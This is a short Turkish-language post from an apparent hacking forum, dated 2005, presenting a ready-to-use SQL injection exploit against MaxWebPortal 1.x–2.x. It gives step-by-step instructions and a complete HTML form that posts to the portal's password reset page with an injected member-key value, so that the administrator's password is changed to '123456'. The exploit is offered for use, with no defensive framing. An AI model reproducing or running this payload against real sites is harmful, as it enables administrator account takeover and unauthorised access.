Root > Documents > Web Güvenlik Açıkları > MaxWebPortal SQL Inject
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > MaxWebPortal SQL Inject
Madde
  Yazar : Bilginx
  Date : 03.09.2005 05:10:39
 
# MaxWebPortal SQL Inject
 

Max Web Portal 1.x - 2.x Sql Injeciton

Asagidaki Html kodunu bir editör yardimiyla (Örn. Notepad) düzenledikten sonra Html (X.htm) olarak kaydettigimiz dosyayi açiyoruz.

Yapmamiz gereken tek sey Degistir butonuna tiklayarak sifrenin degistirilmesini saglamak.

-------------------Code-----------------------

<form action="http://www.adres.com/password.asp?mode=reset" method="post"> <br> pass1: <input name="pass" type="text" value="123456" size="150"> pass2: <input name="pass2" type="text" value="123456" size="150"> Id: <input name="memId" type="text" value="-1" size="150"> Member Key: <input name="memKey" type="text" value="foo’) or M_Name=’admin’ or (’1’=’2" size="150"> <br> <input name="Submit" type="submit" value="Degistir">

</form>

-------------------EndCode--------------------
   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©